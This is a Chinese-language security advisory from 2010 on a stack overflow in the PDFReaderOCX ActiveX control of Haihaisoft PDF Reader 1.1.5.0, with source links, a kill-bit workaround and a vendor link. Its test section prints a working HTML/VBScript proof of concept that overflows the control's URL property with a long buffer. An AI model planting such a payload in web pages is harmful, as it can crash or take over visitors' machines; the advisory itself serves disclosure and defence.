安全研究

安全漏洞
海海软件PDF阅读器PDFReaderOCX ActiveX控件栈溢出漏洞

发布日期:2010-07-13
更新日期:2010-07-21

受影响系统:
Haihaisoft PDF Reader 1.1.5.0
描述:
海海软件PDF阅读器是全球最轻量级的免费阅读器。

海海软件PDF阅读器所安装的PDFReaderOCX ActiveX控件没有正确地验证URL属性参数,用户受骗访问了恶意网页并在文件名中提供了超过2048字节的超长字符串就可以触发栈溢出,导致执行任意代码。

<*来源:shinnai (shinnai@autistici.org
  
  链接:http://secunia.com/advisories/40520/
        http://www.shinnai.altervista.org/exploits/SH-001-20100714.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<object classid='clsid:28CB49D6-E530-442B-A182-79F047C3AA1B' id='test'></object>

<script language="vbscript">
  buff = "AAAAAAAAAAAAAAABBBB" + String(2011, "C")
  test.URL = buff

  Function tryMe()
   document.location.reload
  End Function

  Sub Window_OnLoad
   setTimeout "tryMe()",2000
  End Sub
</script>

建议:
临时解决方法:

* 为clsid: 28CB49D6-E530-442B-A182-79F047C3AA1B设置kill bit。

厂商补丁:

Haihaisoft
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.drm-x.com/Haihaisoft-Universal-Player.aspx

浏览次数:3204
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障